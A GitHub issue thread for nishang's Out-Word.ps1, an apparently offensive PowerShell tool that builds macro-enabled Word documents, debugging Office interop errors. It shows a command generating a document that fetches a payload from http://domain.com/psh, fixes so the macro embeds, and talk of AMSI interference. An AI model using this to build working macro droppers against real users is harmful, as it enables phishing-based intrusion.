### ISSUE TITLE
Exception setting "DisplayAlerts": "Cannot convert value "False" to type "Microsoft.Office.Interop.Word.WdAlertLevel"

### ISSUE THREAD

**Issue by nmonkee** [samratashok/nishang#34]
Seems to be the same bug as - https://github.com/samratashok/nishang/issues/6.

Word Version: Microsoft® Office 2010 (14.0.4762.1000) MSO (14.0.6112.5000)

c:\ >powershell -command "& { . .\Out-Word.ps1 ; Out-Word -WordFileDir templates -PayloadURL http://domain.com/psh }"
Exception setting "DisplayAlerts": "Cannot convert value "False" to type "Microsoft.Office.Interop.Word.WdAlertLevel".
Error: "Invalid cast from 'System.Boolean' to 'Microsoft.Office.Interop.Word.WdAlertLevel'.""
At C:\Users\nmonkee\Desktop\Out-Word.ps1:179 char:13
-             $Word.DisplayAlerts = $False
-             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  - CategoryInfo          : NotSpecified: (:) [], SetValueInvocationException
  - FullyQualifiedErrorId : ExceptionWhenSetting

**Comment by nmonkee** [comment]
Line  179  contains this:

$Word.DisplayAlerts = $False

Outside of the version check loop when modifying an existing doc. 

Perhaps the issue?

**Comment by nmonkee** [comment]
Fixing that, you then get another error...

Argument: '2' should be a System.Management.Automation.PSReference. Use [ref].
At C:\Users\nmonkee\Desktop\benefits\Out-Word.ps1:292 char:17
+                 $Doc.Saveas([ref]$SavePath, 0)
+                 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : NonRefArgumentToRefParameterMsg

**Comment by nmonkee** [comment]
This seems to make it all play nice:

                $SaveFormat = “microsoft.office.interop.word.WdSaveFormat” -as [type]
                $Doc.Saveas([ref]$SavePath, [ref]$SaveFormat::wdFormatDocumentDefault)

**Comment by nmonkee** [comment]
Probably want [ref]0 or the Macro doesn't get embedded.

**Comment by samratashok** [comment]
Thanks for the fix! Let me test this.

**Comment by hardrock1234** [comment]
It works like charm on windows 7 with office 2013 -  or maybe it's to do with AMSI  ? 

Regards,

**Comment by samratashok** [comment]
Try it with a simple payload (like Get-Process), if the same error persists, its AMSI. Though I don't think it is AMSI. I will test it tomorrow and fix this issue.

**Comment by hardrock1234** [comment]
Cool, trying now and keep you posted, 

Regards

**Comment by samratashok** [comment]
Closing this as no further information was provided.
